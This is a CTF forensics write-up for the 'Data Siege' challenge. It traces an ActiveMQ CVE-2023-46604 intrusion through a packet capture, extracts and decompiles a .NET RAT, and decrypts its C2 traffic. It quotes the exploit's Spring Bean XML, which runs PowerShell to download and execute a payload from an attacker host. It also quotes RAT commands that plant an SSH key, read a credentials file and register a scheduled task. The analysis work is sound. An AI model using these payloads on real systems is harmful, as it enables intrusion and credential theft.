2024 Cyber Apocalypse: Data Siege

#htb #ctf #forensics #activemq #cve-2023-46604 #dotnet-malware #aes-encryption #pcap-analysis

Challenge Information

AttributeDetails
Event2024 Cyber Apocalypse
CategoryForensics
ChallengeData Siege
DifficultyMedium

Summary

Data Siege is a complex forensics challenge involving network traffic analysis, malware extraction, and decryption. The attack exploits CVE-2023-46604 in ActiveMQ to achieve remote code execution, downloads a .NET RAT (Remote Access Trojan), and establishes encrypted command & control communication. The flag is split into three parts recovered from different artifacts.

Analysis

The attack chain:

  1. Entry Point: CVE-2023-46604 (ActiveMQ RCE) on version 5.18.2
  2. Payload Delivery: XML Spring Bean configuration with ProcessBuilder command
  3. Malware Download: PowerShell downloads aQ4caZ.exe from attacker server
  4. RAT Execution: .NET executable (EzRatClient) launches
  5. C2 Communication: Encrypted traffic on port 1234
  6. Flag Distribution:
    • Part 1: In SSH public key echo command
    • Part 2: In credentials file content
    • Part 3: In PowerShell script task name

Solution

Step 1: Identify ActiveMQ Vulnerability

Analyze capture.pcap for ActiveMQ traffic:

Terminal window
tshark -r capture.pcap -Y "tcp.port == 61616" | head -20

Look for ProviderVersion field:

  • Version: 5.18.2
  • CVE: CVE-2023-46604 (RCE vulnerability)

Step 2: Extract Malware Payload Request

Find XML Spring Bean configuration:

Terminal window
tshark -r capture.pcap -Y "http && contains('ProcessBuilder')" -T fields -e "http.file_data"

The XML reveals:

<bean id="WHgLtpJX" class="java.lang.ProcessBuilder" init-method="start">
  <constructor-arg>
    <list>
      <value>cmd.exe</value>
      <value>/c</value>
      <value>powershell Invoke-WebRequest 'http://10.10.10.21:8000/aQ4caZ.exe' -OutFile 'C:\temp\aQ4caZ.exe'; Start-Process 'c:\temp\aQ4caZ.exe'</value>
    </list>
  </constructor-arg>
</bean>

Step 3: Extract Malware Executable

Using Wireshark:

  1. File → Export Objects → HTTP
  2. Select aQ4caZ.exe
  3. Save to disk

Verify with file command:

Terminal window
file aQ4caZ.exe
# Output: PE32 executable (console) Intel 80386 Mono/.Net assembly

Step 4: Analyze .NET Assembly

Using dnSpy (decompiler):

  1. Open aQ4caZ.exe
  2. Examine Program class
  3. Find Decrypt function
  4. Extract encryption key: VYAemVeO3zUDTL6N62kVA
  5. Find salt bytes: [86, 101, 114, 121, 95, 83, 51, 99, 114, 51, 116, 95, 83]

Decryption parameters:

  • Key: VYAemVeO3zUDTL6N62kVA
  • Salt: Very_S3cr3t_S (from bytes)
  • Algorithm: AES with PBKDF2 key derivation

Step 5: Extract C2 Traffic

Export port 1234 data:

Terminal window
tshark -r capture.pcap -T fields -e data -Y "tcp.port == 1234" > output.txt

Step 6: Parse Command Protocol

The protocol uses a format: [length]§[encrypted_data]

Example:

24§1BhuY4/niTopIBHAN6vvmQ==
gs1pJD3U5aold1QaI/LdE+huVKxpC/azbuWUTstbgrbAU9zWdG7mtO0k+T9Mr0X8OBKR254z6toIOEZjd4PACN8tD+nT2n3Pun5DAbmX31vvI+BHavd4pDHEo26YKaUw

Step 7: Decrypt C2 Commands

from Crypto.Cipher import AES
import base64


def decrypt(cipher_text):
    try:
        key = "VYAemVeO3zUDTL6N62kVA"
        cipher_bytes = base64.b64decode(cipher_text)


        from Crypto.Protocol.KDF import PBKDF2
        pdb = PBKDF2(key, bytes([0x56, 0x65, 0x72, 0x79, 0x5f, 0x53, 0x33, 0x63, 0x72, 0x33, 0x74, 0x5f, 0x53]), 32 + 16)


        aes_key = pdb[:32]
        aes_iv = pdb[32:48]


        cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
        decrypted = cipher.decrypt(cipher_bytes)


        # Remove PKCS7 padding
        pad = decrypted[-1]
        return decrypted[:-pad].decode('utf-8')
    except:
        return None

Step 8: Recover Flag Parts

Part 1: In SSH key echo command:

cmd;C:\;echo ssh-rsa AAAAB3NzaC1yc2E... HTB{REDACTED ...

Extract the HTB{ portion from the SSH key line.

Part 2: In credentials file:

cmd;C:\;type C:\Users\svc01\Documents\credentials.txt
Response: Username: svc01
Password: Passw0rdCorp5421


2nd flag part: REDACTED

Part 3: In PowerShell script task name:

upfile;C:\temp\4AcFrqA.ps1
Response: powershell.exe -encoded "..."
Register-ScheduledTask -TaskName "0r3d_1n_7h3_h34dqu4r73r5}" ...

Decode the base64-encoded PowerShell to find task name containing flag part.

Step 9: Combine Flag Parts

Concatenate all three parts to form the complete flag.

Key Concepts

CVE-2023-46604

  • ActiveMQ versions < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3 vulnerable
  • Remote Code Execution through OpenWire protocol
  • Requires network access to OpenWire port (typically 61616)

EzRat Protocol

  • Custom TCP protocol on port 1234
  • Command format: [length]§[encrypted_command]
  • Response format: Base64-encoded, AES-encrypted data
  • File transfer support with separate handling

AES Decryption with PBKDF2

  • Key derivation: PBKDF2(password, salt, count=1000)
  • Produces 48 bytes: 32-byte key + 16-byte IV
  • AES-256-CBC mode

Investigation Checklist

  • Identify ActiveMQ version in PCAP
  • Search for CVE-2023-46604 in traffic
  • Extract Spring Bean XML configuration
  • Locate executable download URL
  • Export malware from HTTP objects
  • Analyze .NET binary with decompiler
  • Extract encryption parameters
  • Export port 1234 traffic
  • Parse command protocol format
  • Decrypt each C2 communication
  • Extract flag parts from responses
  • Combine parts for final flag

Key Takeaways

  • Network traffic analysis reveals attack progression
  • PCAP export of executables enables offline analysis
  • .NET binaries reveal cryptographic parameters when decompiled
  • Custom protocols require understanding command structure
  • AES decryption parameters must be extracted from malware
  • Multi-part flags require correlation across multiple data sources
  • C2 beacons communicate through encrypted channels
  • File transfer capabilities can exfiltrate sensitive data